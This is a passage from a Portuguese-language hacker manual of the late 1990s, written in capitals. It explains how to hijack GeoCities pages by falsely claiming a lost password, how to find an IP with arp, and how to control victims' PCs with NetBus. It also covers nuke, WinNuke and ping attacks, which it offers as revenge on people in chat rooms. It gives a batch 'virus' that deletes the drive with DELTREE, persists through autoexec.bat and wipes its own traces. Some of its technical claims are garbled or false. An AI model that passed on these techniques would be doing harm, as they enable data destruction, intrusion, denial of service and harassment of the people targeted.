SEU NETBIOS, NA MESMA LINHA, ESPARADO POR UM ESPAÇO. SE VOCÊ EXECUTAR O
PROGRAMA NBTSTAT –N, TERÁ A LISTA, COM O NOME E O IP DE SEU COMPUTADOR,
SEMPRE SENDO O PRIMEIRO DA LISTA, SEGUIDO DAS OUTRAS MÁQUINAS
DISPONÍVEIS,TUDO NUMA JANELA DO DOS. ATRAVÉS DO EXPLORER VOCÊ PODERÁ VER OS


                                      12
COMPUTADORES DISPONÍVEIS NA REDE DOS QUAIS VOCÊ AINDA PODERÁ UTILIZAR OS
DISCOS MAPEANDO-OS, O QUE OS TORNARÁ UNIDADES DE SEU COMPUTADOR.



COMO HACKEAR UMA PÁGINA DA GEOCITES?

É A COISA MAIS FÁCIL DO MUNDO...



ENTREI NA PÁGINA DE VÁRIAS PESSOAS E PENSEI PORQUE ATÉ HOJE NÃO OUVI FALAR DE
NINGUÉM QUE TENHA HACKEADO UMA PÁGINA DA GEOCITES. VAMOS DIRETO AO
ASSUNTO:



ANOTE O MEMBER NAME DA PÁGINA DANDO UM SOUCE.

ANOTE O LUGAR QUE ESTA PÁGINA ESTÁ, POR EXEMPLO:
http://www.geocites.com/AUGUSTA/2000. LOGICAMENTE VOCÊ SÓ VAI ANOTAR O
DIRETÓRIO E O BLOCK.

AGORA VÁ ATÉ A PÁGINA PRINCIPAL DA GEOCITES E CLIQUE NO LINK CONTACT GEOCITES,
DEPOIS CLIQUE EM SYSTEM PROBLEMS, E DEPOIS EM SYSTEM PROBLEMS REPORTING
FORM. LÁ VOCÊ VAI COLOCAR AS INFORMAÇÕES NECESSÁRIAS, O DIRETÓRIO, ACIMA
CITADO, O BLOCK (ACONSELHO FAZER FOWARD) E NO ESPAÇO ABAIXO VOCÊ VAI COLOCAR
OPROBLEMA. DIGA QUE AINDA NÃO RECEBEU SUA SENHA, EM INGLÊS: "EXCUSE ME FOR
THE UP SET, BUT I DIDN’T RECEIVE MY SIGNAL".

PORRA! COMO É RIDÍCULO NÉ? AGORA É SÓ ESPERAR 3 OU 4 DIAS NO MÁXIMO QUE VOCÊ
RECEBE SUA SENHA!



ASTREANDO IP PELO MS-DOS

TODO MUNDO TEM O MS-DOS INSTALADO EM SEU COMPUTADOR, POR ISSO, QUASE
NINGUÉM SABE QUE TEM UM POTENTE RASTREADOR E IP EM SUA MÁQUINA.



MAS ANTES DE TUDO, O QUE É UM ENDEREÇO IP?



ENDEREÇO IP É UM NÚMERO QUE VOCÊ RECEBE QUANDO SE CONECTA A UM SERVIDOR.
UM EXEMPLODE SERVIDOR DE IP É 200.200.200.200. OS TRÊS PRIMEIROS NÚMEROS
REPRESENTAM O DNS DE SEU SERVIDOR, E O ÚLTIMO NÚMERO QUE VARIA. NO BRASIL,


                                      13
TODOS OS IP’S COMEÇAM COM 200.



PARA RASTREAR, VOCÊ DEVE USAR UM PROGRAMA CHAMADO ARP, PRESENTE NO DOS. O
COMANDO QUE DEVE SER DIGITADO É ARP -A. VOCÊ TERÁ UMA LISTA DE ENDEREÇOS DE IP.
MAS COMO SABER QUAL É O DA PESSOA?? VOCÊ DEVE TER CERTEZA QUE A ÚLTIMA
INFORMAÇÃO QUE CHEGOU NO SEU MODEM VEIO DA PESSOA QUE VOCÊ QUER SABER O
IP. E DAÍ ENTRAR COM O COMANDO NO MS-DOS. O IP DA PESSOA SERÁ O PRIMEIRO.



TAMBÉM EXESTEM OUTROS PROGRAMAS COMO O NETSTAT. COM ELE VOCÊ PODE
RASTREAR QUAL É O SERVODOR DA PESSOA E OUTROS. MAS ESSE PROGRAMA É
COMPLICADO E VOCÊ QUER SABER COMO USÁ-LO DIGITE NETSTAT –H, E A TELA DE AJUDA
APARECE. O QUE FAZER COM O ENDERÇO DE IP? VOC~E PODE NUKAR A PESSOA. O NUKE É
IUM PROGRAMA QUE ENVIA UMA MENSAGEM DE ERRO PELA PORTA 139, FAZENDO A
CONEXÃO DA VÍTIMA CAIR. VOCÊ TAMBÉM PODE INVADIR O COMPUTADOR DA VÍTIMA
USANDO O BACK ORIFICE OU OUTRO PROGRAMA.



MANUAL DO NETBUS

HOST NAME/IP- COLOQUE O IP DA VÍTIMA.

PORT- COLOQUE 12345 CASO JÁ NÃO HAJA UMA SELECIONADA.

IN INTERVAL, FUNCTION DELAY, MEMO E ABOUT- DEIXE COMO ESTÁ.

ADD IP- CASO O IP SEJA FIXO, ADICIONE ELE EM UMA LISTA.

DEL IP- DELETE O IP ADICIONADO ANTERIORMENTE.

CONNECT- ESTE É O BÁSICO, APÓS TER COLOCADO O IP DA COBAIA, SE CONECTE.

SCAN- SCANEIA IP COM O PATCHE.

SERVER ADMIN- MUDA AS CONFIGURAÇÕES DO NET BUS DA COBAIA. POSSUI ATÉ A OPÇÃO
REMOVE A SERVER, OU SEJA, REMOVE O PATCHE DO MICRO DELA.

OPEN CD ROOM- ABRE E FECHA O CD ROOM DA VÍTIMA CONFORME VOCÊ CLIQUE.

SHOW IMAGE- VOCÊ DIGITA A URL DE UMA FOTO E ELA IRÁ APARECER NO MICRO DA
COBAIA.

SWAP MOUSE- FAZ COM QUE OS BOTÕES DO MOUSE SE TROQUEM.

START PROGRAM- EXECUTA UM PROGRAMA NO MICRO DA COBAIA.


                                         14
MSG MANAGER- POSSIBILITA A VOCÊ MANDAR MENSAGENS DE ERRO, EDITADAS POR
VOCÊ. VOCÊ PODE DEIXAR QUE ELA RESPONDA, OU NÃO...

SCREENDUMP- DARÁ UM PRINT SCREEEM, NA TELA DA COBAIA, SALVANDO A IMAGEM DA
COBAIA NO SEU NETBUS.

GET INFO- DARÁ INFORMAÇÕES DA PESSOA, POR QUAL ARQUIVO ELA ESTÁ INFECTADA,
ETC.

PORT REDIRECT- MUDA A PORTA PELA QUAL VOCÊ UTILIZA PARA CONECTAR, MUITO
COMPLEXO, POIS EXEISTEM POUCAS, MELHOR DEIXAR COMO ESTÁ.

PLAY SOUND- TOCARÁ UM SOM, QUE ESTÁ PRESENTE NO MICRO DA COBAIA. COLOQUE A
LINHA DE COMANDO.

EXIT WINDOWS- RESETAR A COBAIA, DESLIGAR DIRETO, VOCÊ ESCOLHE.

SEND TEXT- SERVE PARA FALAR COM OUTROS INVASORES, CASO HAJA ALGUM.

ACTIVE WNDS- VER AS JANELAS QUE ESTÃO ATIVAS NO PC DA VÍTIMA. VOCÊ PODE ATIVAR,
FECHAR OU ABRIR QUALQUER JANELA.

APP REDIRECT- BESTEIRA

MOUSE POS- VOCÊ ESCOLHE UMA POSIÇÃO PARA O MOUSE DELA FICAR. A COBAIA VAI
FICAR LOUCA...

LISTEN- ESTA É UMA DAS MELHORES!! VOCÊ PODE VER O QUE A PESSOA ESCREVE E
ESCREVER PARA ELA (HE, HE!). APROVEITE QUANDO A VÍTIMA ESTIVER FALANDO EM CANAL
ABERTO, PARA QUEIMAR O FILME DELA COM FRASES CABULOSAS.

SOUND SYSTEM- SERVE PARA CONTROLAR O SISTEMA DE SOM DA VÍTIMA. AUMENTE NO
MÁXIMO E EXECUTE UMA FILE WAVE!



SERVER SETUP- MUDA AS CONFIGURAÇÕES DO NET BUS DA PESSOA.



CONTROL MOUSE- VOCÊ CONTROLA O MOUSE DA VÍTIMA.



GO TO URL- COLOQUE UMA HOME PAGE QUE VOCÊ PREFERIR, OU ODIAR, PARA A COBAIA
IR.



KEY MANAGER- ESTA TAMBÉM É MUITO MASSA! VOCÊ PODE DESATIVAR TECLAS DO

                                      15
TECLADO DA PESSOA. É MELHOR DESATIVAR ALGUMAS TECLAS, PRINCIPALMENTE AS
VOGAIS.



FILE MANAGER- ESSA MATA A PAU!!!VOCÊ TERÁ ACESSO AO HD DA PESSOA E SUAS
PARTIÇÕES! TUDO, TUDO SEU!!!!!! PODENDO FAZER DOWNLOAD, UPLOAD, O QUE QUISER!
MAS LEMBRE-SE: ENTRE, OLHE, BRINQUE, MAIS JAMAIS APAGUE!



O NUKE

HÁ MUITA CONFUSÃO NO AR A RESPEITO DO NUKE, PRINCIPALMENTE DEPOIS DO
SURGIMENTO DO WINNUKE. SURGIRAM PROTEÇÕES E DETETORES, E MUITA GENTE SE
ESPANTA SOBRE O MOTIVO DE ELAS FUNCIONAREM EM ALGUNS CASOS E EM OUTROS
NÃO. INFELIZMENTE, ESSA CONFUSÃO TEM ORIGEM MUITO SIMPLES: WINNUKE NÃO É
NUKE! VAMOS ANALIZAR CADA UMA DAS DUAS TECNOLOGIAS COM PROFUNDIDADE
SUFICIENTE PARA DESFAZER ESTE EQUÍVOCO. INICIALMENTE, APRESENTAREMOS UM TEXTO
DE AUTORIA R.



O QUE É NUKE?



NUKE ÉO NEME ATRBUIDO A PROGRAMAS QUE FINALIZAM PREMATURAMENTE COM UMA
CONEXÃO TCP ATRAVÉS DO ENVIO DE ICMP COM MENSAGENS DE ERRO. TAIS PACOTES
PODEM SER DIRECIONADAS PARA O SERVIDOR, OU PARA O CLIENTE.



TAIS PROGRAMAS TEM A FINALIDADE DE TERMINAR COM A CONEXÃO FAZENDO COM QUE
O CLIENTE OU O SERVIDOR SEJAM ENGANADOS POR UMA MENSAGEM DE ERRO QUE
NORMALMENTE INDICARIAM UM PROBLEMA DE CONEXÃO ENTRE OS DOIS. O EFEITO DE
TAL PROGRAMA PARA A VÍTIMA É A DESCINEXÃO DO SEU SERVIDOR, GERALMENTE SEM
EFEITOS COLATERAIS. NUN EXEMPLO PRÁTICO SERIA COMO SE VOCÊ FOSSE
DESCONECTADO DO SERVIDOR DE IRC.



HISTÓRICO

ACREDIT QUE O PRIMEIRO PROGRAMA NUKE FOI O NUKE.C, PARA UNIX. SEU AUTOR SE
CHAMAVA SATANIC MECHANIC. ESTE PROGRAMA ENVIAVA PACOTES ICMP COM
MENSAGENS DE ERRO NA PORTA 23 DOSERVIDOR, FINALIZANDO ASSIM COM CONEXÕES
TELNET. COM A CRIAÇÃO DE FIREWALLS, NUKES DIRECIONADOS AO SERVIDOR PASSARAM A


                                     16
NÃO SER MAIS EFICIENTES. PASSOU-SE ENTÃO A NUKAR O HOST DO CLIENTE, NO ENTANTO,
O FATO DO CLIENTE NÃO POSSUIR UMA PORTA FIXA PARA FIXA PARA ESTABELECER
CONEXÃO COM O SERVIDOR DIFICULTA A OPERAÇÃO. A SOLUÇÃO PARA ISSO FOI O
DEESENVOLOVIMENTO DE PROGRAMAS QUE VARREM SEQUENCIALMENTE TODAS AS
PORTAS DO CLIENTE AONDE PODE EXIXTIR UMA CONEXÃO (DE 1024 A 65535),
BOMBARDEANDO ELAS COM MENSAGENS DE ERRO ATÉ QUE SE ENCONTRE A PORTA ONDE
SE DEU A CONEXÃO COM O SERVIDOR.



O NÚMERO DE PROGRAMAS NUKING PARA UNIX SUPERA EM MUITO OS EQUIVALENTES
PARA WINDOWS, ALÉM DE GERALMENTE SEREM MUITO MAIS EFICIENTES DEVIDO AS
LIMITAÇÕES DO WINSOCK. ALGUNS PROGRAMAS DE NUKING DESENVOLVIDOS PARA O
WINSOCK 2.2 JÁ ESTÃO SENDO LANÇADOS, ESTES SIM MUITO MAIS PODEROSOS DO QUE
OS SEUS ANTECESSORES PARA A PLATAFORMA MICROSOFT. ENTRE ESSES POSSO CITAR O
CLICK4 QUE REALMENTE É MUITO MAIS PODEROSO.



UM DOS PRIMEIROS PROGRAMAS NUKE PARA A PLATAFORMAWINDOWS, FOI O WNUKE. É
UM APLICATIVO EM 16 BITS QUE UTILIZA OS RECURSOS DO TRUMPET WINSOCK PARA
ENVIAR OS PACOTES. FORAM LANÇADAS DIVERSAS VERSÕES DESTE PROGRAMA, CADA
UMA IMPLEMENTANDO MAIS RECURSOS COMO CONTROLE DO TIPO DE MENSAGEM ICMP
ENVIADA E DELAY ENTRE O ENVIO DOS PACOTES, DE FORMA QUE O PROGRAMA PODERIA
SER UTILIZADO POR PESSOAS QUE NÃO DISPÕE DE UMA CONEXÃO DE ALTA VELOCIDADE
COM A INTERNET.



COMO EU UTILIZO O NUKE?

BASICAMENTE TODOS OS PROGRAMAS DE NUKE UTILIZAM O MESMO PRINCÍPIO:



DEFINIR O ALVO DOS PACOTES;

DEFINIR O HOST DO CLIENTE;

DEFINIR O HOST DO SERVIDOR;

DEFINIR AS PORTAS A SEREM NUKADAS NO CLIENTE;

DEFINIR AS PRTAS A SEREM NUKADAS NO SERVIDOR;

DEFINIR O INTERVALO ENTRE OS PACOTES ENVIADOS;

UMA VEZ DETERMINADOS ESSES PARÂMETROS O PROGRAMA INICIA O ENVIO DE PACOTES
DE ERRO. QUANTO MAIS RÁPIDA FOR A SUA CONEXÃO COM A INTERNET, MAIS RÁPIDO

                                      17
SERÁ O ENVIO DOS PACOTES, E MAIS RÁPIDO A VÍTIMA SERÁ ATINGIDA. NO LUGAR DA
PORTA DO SERVIDOR, O MAIS ÓBVIO É COMEÇAR A VARREDURA A PARTIR DA PORTA 6667,
QUE É A PORTA DEFALT PARA A MAIORIA DOS SERVIDORES DE IRC.



O TIPO DE MENSAGEM DE ERRO ENVIADA PODE SER DETERMINADA PREFERENCIALMENTE
PELO TIPO DE ALVO. SE O ALVO FOR UMA MÁQUINA UNIX, MENSAGENS DE HOST
UNREACHABLE DEMONSTRAM MAIOR EFICIÊNCIA. NO CASO DE MÁQUINA WINDOWS,
"PROTOCOL UNREACHEBLE" DEMONSTROU SE MAIS EFICIENTE.



OOB: O BUG DA PORTA 139



DIVERSOS PROGRAMAS UTILIZAM ESSE BUG PARA TRAVAR SISTEMAS WINDOWS, GERANDO
DoS ATRAVÉS DO ENVIO DE UM PACOTE OOB (OUT FO BAND) MARCADO COMO URGENTE
PARA AS PORTAS ESPECÍFICAS, COMO POR EXEMPLO A PORTA 139. SISTEMAS WINDOWS
NT SEM O HOTFIX.



OOBFIX INSTALADO AINDA NÃO AFETADOS EM DUAS OUTRAS PORTAS. APESAR DE SEREM
CHAMADOS DE NUKE, NA VERDADE ESSES PREGRAMAS TEM FUNCIONAMENTO
TOTALMENTE DIFERENTE, ELES APENAS SE APROVEITAM DE UMA FALHA DO SISTEMA.



CONFORME DESCRITO EM SEÇÕES ANTERIORES, O FUNCIONAMENTO DE PROGRAMAS
NULE É DIFERENTE. OS EFEITOS DE UM PROGRAMA DE OOB SÃO FACILMENTE
PERCEPTÍVEIS. TODO O SISTEMA DE REDE DO WINDOWS ENTRA EM PÂNICO E
GERALMENTE É NECESSÁRIA A REINICIALIZAÇÃO DO SISTEMA PARA QUE A SITUAÇÃO SEJA
NORMALIZADA. FELIZMENTE JÁ EXISTEM DIVERSOS PATCHES DISPONÍVEIS PARA RESOLVER
ESTE PROBLEMA.



PINGA BOOM



INICIALMENTE VALE EXPLICAR QUE NÃO ESTAMOS FALANDE DE CTCP PING, E SIM DO
PROGRAMA PING QUE VERIFICA SE UM ENDEREÇO DE IP EXISTE E ESTÁ ACESSÍVEL. O MAU
USO INTENCIONADO DESTE PROGRAMA, A PARTIR DE UMA CONEXÃO RÁPIDA COM A REDE
FAZ COM QUE A VÍTIMA CAIA NUM LAG QUE PROVAVELMENTE O LEVARÁ A DESCONEXÃO
POR PING TIMEOUT, DEVIDO A QUANTIDADE DE PACOTES RECEBIDOS SUPERAR EM MUITO


                                      18
A CAPACIDADE DE ESSES MESMOS SEREM DESENVOLVIDOS.



WINNUKE



UM BUG DO SUBSISTEMA DE REDE DO UNIX 3.X,M 95 E NT PERMITE QUE USUÁRIOS
EXTERNOS POSSAM DESATIVAR TOTALMENTE O SEU ACESSO À REDE, SIMPLESMENTE
ENVIANDO INFORMAÇÕES MARCADAS COMO URGENTES A DETERMINADAS PORTAS DO
SEU COMPUTADOR (SENDO QUE A MAIS USUAL É A 139). ESSE ATAQUE DE DoS DESABILTA
TOTAÇMENTE A COMUNICAÇÃO TCP/IP DA SUA MÁQUINA RETORNANDO AO NORMAL
APENAS APÓS O REBOOT DA SUA MÁQUINA. EXISTEM PROTEÇÕES DISPONÍVEIS QUE
SIMPLESMENTE FECHAM A PORTA 139. ISSO NÃO É EFICENTE, POIS O ATAQUE OOB PODE
SER EXECUTADO EM OUTRAS PORTAS MENOS USUAIS TAMBÉM. DA MESMA FORMA, OS
DETETORES DE QUE SE DESTINAM A IDENTIFICAR A ORIGEM DOS ATAQUES DE OOB
TAMBÉM NÃO TEM EFICIÊNCIA MÁXIMA PORQUE LIMITAM-SE A OUVIR A PORTA 139.
ALÉM DISSO, ELES NÃO DEVERIAM CHAMAR-SE DETECTORES DE NUKE, UMA VEZ QUE O
ATAQUE QUE ELES DETECTAM NÃO CONSTITUI UM NUKE CANÔNICO, MAS APENAS UM
EXPLOIT DE UM BUG DO MICROSOFT WINSOCK.



PEGANDO O IP DE ALGUÉM EM UMA SALA DE CHAT



JÁ DEVE TER ACONTECIDO COM VOCÊ DE ESTAR EM UM CHAT DE WWW E ALGUÉM TE
XINGAR. XINGAR NÃO RESOLVE, APENAS MANTÉM A BRIGA. MAS QUE TAL SE VINGAR COM
UM POUCO MAIS DE CLASSE? SERIA UMA BOA HEIN? QUE TAL NUKAR O OTÁRIO OU
ENTRAR EM NO SERVER DE IP DELE, PEGAR UM A SENHA E AMEAÇÁ-LO? ISSO SIM QUE É
ESTILO! COM UM RASTREADOR DE IP E ALGUNS PROGRAMINHAS VOCÊ PODERÁ FODER
LEGAL.



PEGAR O IP DE ALGUÉM EM UMA SALA QUE NÃO ACEITE TAGS HTML É MAIS FÁCIL DO QUE
PEGAR IP EM SALA QUE ACEITE TAGS DE HTML. O TRUQUE É SIMPLES: VÁ AO PROMPT DO
MS DOS E DIGITE ARP –A. COM ISSO IRÁ APARECER UM MONTE DE IP’S. O PRIMEIRO IP É O
SEU EO ÚLTIMO DA PESSOA QUE TE MANDOU A ÚLTIMA MENSAGEM. VAMOS SUPOR QUE
O RICK TE MANDOU UMA MENSAGEM. DAÍ VOCÊ RESOLVE PEGAR O IP DELE, E VAI AO E
DIGITA ARP –A. O ÚLTIMO IP DA LISTA É O IP DO RICK. PRONTO, AGORA VOCÊ JÁ TEM O IP
PROMPT DO MSDOS DO CARA. É SÓ PEGAR UM PROGRAMA NUKE E DERRUBAR O OTÁRIO.




                                        19
OS VÍRUS

OS VÍRUS PODEM SER CCATALOGADOS EM TRÊS CATEGORIAS BÁSICAS:



VÍRUS DE BOOT: OS VÍRUS DE BOOT SÃO TRANSMITIDOS BASICAMENTE POR DISQUETES,
COPIANDO-SE PARA O SERTOR BOOT (O GRUPO DE INSTRUÇÕES QUE O COMPUTADOR LÊ
QUANDO É LIGADO). JÁ TIVERAM O SEU ALGE DA FAMA, MAS HOJE ESTÃO CADA VEZ MAIS
RAROS.



VÍRUS EXECUTÁVEIS: TAMBÉM CONHECIDOS COMO VÍRUS DE ARQUIVOS ESTES
PROGRAMAS SE ANEXAM AO CÓDIGO EXECUTÁVEL DE OUTROS PROGRAMAS,
PRINCIPALMENTE OS QUE TEM A TERMINAÇÃO .EXE OU .COM. QUANDO UM PROGRAMA
INFECTADO É EXECUTADO, O VÍRUS VAI PARA A MEMÓRIA DO COMPUTADOR E LÁ INFECTA
OUTROS PROGRAMAS, EXECUTADOS POSTERIORMENTE.



VÍRUS DE MACRO: ESTES VÍRUS ATACAM ARQUIVOS DE GABARITOS (TEMPLATES) DO
MICROSOFT OFFICE, PRINCIPALMENTE OS ARQUIVOS NORMAL .DOT. A PARTIR DESTA
CONTAMINAÇÃO. TODO O DOCUMENTO CRIADO POSSUIRÁ VÍRUS DENTRO DELE, E ESTE É
UMA RAZÃO PELA QUAL ESSA CATEGORIA DE VÍRUS PE A MAIS DIFUNDIDA ATUALMENTE. A
OUTRA É A RAZÃO DE SER MUITO FÁCIL PROGRAMAR EM VBA DO QUE LINGUAGEM COMO
ASSEMBLER OU C++ UTILIZADA PELOS PROGRAMADORES DE VÍRUS EXECUTÁVEIS.



UMA BOA ESTRATÉGIA DE SEGURANÇA É MANTER A OPÇÃO DE PROTEÇÃO CONTRA VÍRUS
HABILITADA NO WORD. ESTA OPÇÃO ESTÁ ABILITADA NO MENU
FERRAMENTAS/OPÇÕES/GERAL/ATIVAR PROTEÇÃO CONRA VÍRUS DE MACRO. ASSIM,
SEMPRE QUE ALGUM ARQUIVO COM MACROS FOR ABERTO, EXISTIRÁ UMA OPÇÃO DE
DESABILIITAR O SEU CARREGAMENTO.



FAZER VÍRUS

AGORA VOCÊ APRENDERÁ COMO FAZER ALGUNS TIPOS DE VÍRUS "SIMPLES". VÍRUS MAIS
COMPLEXOS, EXIGEM CONHECIMENTOS DE PROGRAMAÇÃO. EM PRIMEIRO LUGAR VOCÊ
DEVE LOCALIZAR O ARQUIVO EDIT.COM NA PASTA C:WINDOWSCOMMAND. COM O
ARQUIVO ENCONTRADO, COPIE –O PARA UM DISQUETE E ABRA-O. IRÁ APARECER UMA
TELA AZUL. É UM EDITOR COM POUCOS RECURSOS. ENTÃO DIGITE:




                                     20
@ECHO OFF



BREAK OFF



DEPOIS DISSO, VOCÊ ESCOLHE O TIPO DE VÍRUS QUE QUER FAZER.



VAMOS SUPOR QUE O VÍRUS IRÁ APAGAR TODOS OS ARQUIVOS DO PC ALHEIO. VOCÊ DEVE
USAR OS SEGUINTES COMANDOS:



DELTREE/Y C:*.*



CASO QUEIRA QUE APAGUE OS ARQUIVOS DE SISTEMA, USE OS SEGUINTES COMANDOS:



DEL C:AUTOEXEC.BAT



DEL C:COMMAND.COM



DEL C:CONFIG.SYS



É UMA QUESTÃO DE LÓGICA. USE A LÓGICA PARA CRIAR OS SEUS VÍRUS E PARA QUE ELES
FAÇAM O QUE VOCÊ QUEIRA. DEPOIS USE O COMANDO COPY (NOME DO VÍRUS).BAT
AUTOEXEC.BAT, ELA ENTÃO TERÁ A CERTEZA DE ESTAR EXECUTANDO O SEU VÍRUS AO
INICIAR O COMPUTADOR ALVO.



DEPOIS DE TUDO, SALVE O VPIRUS COM A EXTENSÃO .BAT, DE FORMA QUE FIQUE:
OQUEQUISER.BAT. AGORA O SEU VÍRUS ESTÁ PRONTO, BASTA SER EXECUTADO E O VÍRUS
IRÁ TOMAR AS PROVIDÊNCIAS NECESSÁRIAS.



IMPORTANTE: CASO FOR PASSAR ESSE VÍRUS VIA DISQUETE, VOCÊ NÃO DEVE ESQUECER DE

                                       21
FINALIZAR O ARQUIVO COM O COMANDO DELTREE/Y A:*.*. ISSO SERVE PARA NÃO DEIXAR
VESTÍGIO DO SEU ATO INSANO.



TELNET

É O PROTOCOLO INTERNET PARA ESTABELECER CONEXÃO ENTRE COMPUTADORES.
ATRAVÉS DESSA CONEXÃO REMOTA, PODE-SE EXECUTAR PROGRAMAS E COMANDOS EM
OUTRA MÁQUINA, COMO SE O TECLADO DE SEU COMPUTADOR ESTIVESSE LIGADO
DIRETAMENTE A ELA. O VISUAL DE UMA CONEXÃO VIA TELNET É SEMELHANTE AO QUE SE
TEM EM BBS’S DE INTERFACE DOS. E A OPERAÇÃO DO COMPUTADOR REMOTO SE DÁ DA
MESMA FORMA, OU SEJA, ATRAVÉS DE UMA LINHA DE COMANDOS UNIX OU A PARTIR DE
UM MENU DE COMANDOS DISPONÍVEIS QUE SEMPRE SE APRESENTA EM ALGUM LUGAR DA
TELA (ESTA ÚLTIMA É A MAIS COMUM ESTRE SERVIDORES QUE PERMITEM ACESSO AO
PÚBLICO). O TELNET PODE SER USADO PARA A PESQUISA DE INFORMAÇÕES E
TRANFERÊNCIA DE ARQUIVOS – TUDO DEPENDE DO QUE O COMPUTADOR VOCÊ ESTÁ
CONECTADO PERMITIR QUE VOCÊ FAÇA. ELE TAMBÉM É MUITO USADO POR OPERADORES
DE SISTEMAS (SYSOPS) A FIM DE FAZER ALGUM TIPO DE MANUTENÇÃO (SE VOCÊ PENSA
QUE O SYSOP DE SEU PROVEDOR SAI DE CASA TODA VEZ QUE TEM ALGUM PROBLEMA NOS
SERVIDORES, ESTÁ MUITO ENGANADO. MUITAS VEZES ELE FAZ A MANUTENÇÃO DE CASA
MESMO, VIA TELNET.



PARA FAZER UMA CONEXÃO VIA TELNET É NECESSÁRIO UM PROGRAMA ESPECÍFICO. O
WINDOWS 95 JÁ VEM COM UM.



CONECTANDO-SE VIA TELNET: INICIE O TELNET QUE FICA NA PASTA WINDOWS, CLIQUE EM
CONECTA, SISTEMA REMOTO E DIGITE NA CAIXA NOME DO HOST O ENDEREÇO AO QUAL
DESEJA CONECTAR-SE. NAS CAIXAS "PORTA" E "TIPO DO TERMINAL" SELECIONE TELNET
VT100. FEITO ISSO, CLIQUE NO BOTÃO CONECT. ISSO INICIARÁ A CONEXÃO COM O
COMPUTADOR REMOTO. FREQUENTEMENTE, AO FINALIZAR A CONEXÃO, O SISTEMA
REMOTO PEDE UMA SENHA. DIGITE "GUEST" E APERTE ENTER. ISTO ABRIRÁ AS PORTAS DO
COMPUTADOR REMOTO PARA VOCÊ. NA TELA SURGE UMA SÉRIE DE OPÇÕES, PRECEDIDAS
DE UM NÚMERO OU LETRA. PARA EXECUTAR ALGUNS DESTES COMANDOS, DIGITE ALGUM
DESSES NÚMEROS OU LETRAS E APERTE ENTER. EXPLORE O SISTEMA AO QUAL VOÊ
CONECTOU PARA EXERCITAR.



COMANDOS BÁSICOS DE UNIX: A MAIORIA DOS SERVIDORES NÃO PERMITE ACESSO AO
PÚBLICO VIA TELNET, PORQUE ESSA É A PRINCIPAL PORTA DE ENTRADA PARA HACKERS.
NESTES SERVIDORES NÃO SE ENCONTRAM MENUS QUE FACILITAM A NAVEGAÇÃO PELO
SITE OU MENUS DE QUALQUER TIPO, O QUE LEVA A NECESSIDADE DE CONHCER ALGUNS

                                      22
COMANDOS BÁSICOS DE UNIX. SE VOCÊ É WEBMASTER, MUITAS VEZES VAI TER ACESSSO A
PROVEDORES DE PRESENÇA, DE FTP E EM ALGUNS CASOS TELNET, PARA EFETUAR
ALGUMAS OPERAÇÕES QUE O FTP NÃO PERMITE. SEGUE ABAIXO UMA LISTA QUE LHE
SERÃO MUUITO ÚTEIS NESTE CASO:



LS –L: LISTA OS ARQUIVOS DE UM DIRETÓRIO



LS –AL: LISTA TODOS OS ARQUIVOS DE UM DIRETÓRIO, INCLUSIVE OS HIDDEN



CP X Y: COPIA UM ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIO Y



MV XY: MOVE O ARQUIVO DO DIRETÓRIO X PARA O DIRETÓRIOY



RM X: DELETA O ARQUIVO X



CD XXX: MUDA O DIRETÓRIO ATIVO PARA XXX



CD..: SAI DE UM DIRETÓRIO



MKDIR XXX: CRIA O DIRETÓRIO XXX DENTRI DO DIRETÓRIO ATUAL



RM XXX: REMOVE O DIREÓRIO XXX



OS PROTOCOLOS TCP/IP

PARA ENTENDER COMO ATAQUES FUNCIONAM, É NECESSÁRIO TER UMA PEQUENA NOÇÃO
DE COMO TRABALHA A INTERNET, OU PELO MENOS COMO FUNCIONA A SUA BASE DE
PROTOCOLOS DE COMUNICAÇÃO. ESTA FAMÍLIA DE PROTOCOLOS É CHAMADA TCP/IP.
COMO SABEMOS, CADA COMPUTADOR LIGADO À INTERNET É IDENTIFICADO POR UM
NÚMERO DE IP. A MAIORIA DAS PESSOAS CONECTADAS NÃO TEM UM NÚMERO DE IP FIXO,
CADA VEZ QUE SE CONECTAM AO PROVEDOR RECEBEM UM NOVO NÚMERO DE IP. APESAR

                                       23
DE UM IP SER UTILIZADO PARA IDENTIFICAR UMA MÁQUINA DENTRE MILHÕES
CONECTADAS A INTERNET, ELE NÃO É SUFICIENTE PARA QUE ESTA MÁQUINA TROQUE
INFORMAÇÕES COM OUTRAS. POR EXEMPLO,UM MESMO ENDEREÇO DE IP 200.230.137.4
PODE SER UTILIZADO TANTO PARA CONEXÕES VIA WWW, IRC E FTP. COMO UM CLIENTE DE
WWW PEDE UM SERVIÇO PARA ELE? E COMO A MÁQUINA 200.230.137.4 DIFERENCIA SEUS
DIVERSOS SEVIÇOS OFERECIDOS À INTERNET? É AÍ QUE SURGE UM IMPORTANTE
CONCEITO, MUITAS VEZES NEGLIGENCIADO PELOS USUÁRIOS, MAIS É VITAL PARA
PREENCHER OS VÁRIOS TIPOS DE ATAQUES DE CRACKERS, QUE É O DA "PORTA". AGORA,
ALÉM DE DIFERENCIARMOS AS MÁQUINAS DA INTERNET, PODEMOS IDENTIFICAR OS
SERVIÇOS QUE ELAS PRESTAM, E CADA UM DELES É IDENTIFICADO COM UM NÚMERO
DIFERENTE. ESTES NÚMEROS SÃO PADRONIZADOS, PARA EVITARMOS CONFUSÃO. POR
EXEMPLO, PARA UTILIZAR O SERVIÇO DE WWW DA NOSSA MÁQUINA 200.230.137.4, BASTA
ABRIRMOS UMA CONEXÃO PELA PORTA 80. O FTP UTILIZA A PORTA 21, O ICQ USA PORTAS
NA FAIXA 1000-2000, E IRC PORTAS 6666, 6667, 6668. EXISTEM CERCA DE 65535 NÚMEROS
DISPONÍVEIS PARA SEREM UTILIZADOS EM UMA ÚNICA MÁQUINA. QUANTO MAIS
SERVIÇOS A MÁQUINA OFERECE, MAIS PORTAS (E SEUS NÚMEROS) SÃO DISPONIBILIZADOS.
ATÉ MESMO A SUA MÁQUINA WINDOWS 95/98, QUE APARENTEMENTE NÃO OFERECE
SERVIÇO NENHUM, TEM PORTAS ABERTAS.



A COLETA DE DADOS

UM ATAQUE BEM SUCEDIDO A UM COMPUTADOR É AQUELE QUE EXPLORA A
VULNERABILIDADE EXISTENTE EM UM PROGRAMA OU SERVIÇO RODANDO NA MÁQUINA.
COMO JÁ DISSEMOS ANTES, A MAIORIA DOS SERVIÇOS É ACESSADO ATRAVÉS DA
CAMADATCP/IP, E SÃO IDENTIFICADOS POR UM NÚMERO DE PORTA. ATAQUES AO
PRÓPRIO MECANISMO DE MANIPULAÇÃO DO PROTOCOLO DO TCP/IP TAMBÉM SÃO
